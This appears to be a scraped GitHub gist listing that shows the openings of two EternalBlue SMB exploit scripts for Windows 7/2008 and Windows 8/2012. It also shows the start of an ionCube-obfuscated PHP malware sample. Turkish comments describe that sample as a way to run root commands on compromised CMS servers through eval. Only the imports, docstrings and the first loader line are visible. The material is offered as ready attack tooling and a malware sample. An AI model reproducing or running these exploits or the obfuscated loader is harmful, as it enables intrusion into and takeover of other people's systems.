Skip to content

Instantly share code, notes, and snippets.

View kanibaspinar's full-sized avatar
🏠
Working from home

Kani kanibaspinar

🏠
Working from home
View GitHub Profile
@kanibaspinar
kanibaspinar / eternalblue2012.py
Created May 17, 2017 22:20
EternalBlue Windows 8 & Server 2012 - Bypass Windows 10
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@kanibaspinar
kanibaspinar / eternalbluewin7-2008.py
Created May 17, 2017 22:20
EternalBlue Windows 7/2008
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@kanibaspinar
kanibaspinar / diff98.php
Last active March 1, 2018 14:23
ionCube Malware
# * Şubat ayında keşfedilen ioncube ile gizlenmiş yeni bir malware tespit edildi.
# * Genellikle eval üzerinden işlem yapan bu script, sistemler ve kullanıcılar tarafından oldukça zor bir şekilde tespit edilebiliyor.
# * Sunucu'da root yetkisinde istediği komutu çalıştırmak için kötü niyetli kişiler, benzersiz bir kimliğe sahip ioncube şifrelemesi ile
# * evalden faydalanarak istedikleri komutları çalıştırabilecek bir zararlı ortaya çıkarıyorlar. Bu zararlının kaynağı ioncube olduğu için
# * sistemler tarafından imza tanımlanmaması durumunda tespit edilemiyor. Özellikle CMS sistemler hedef alınıyor.
# * Genellikle kullanılan dosyalar menu.php - ini.php - diff98.php - wrgcduzk.php
<?php //00037a
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @f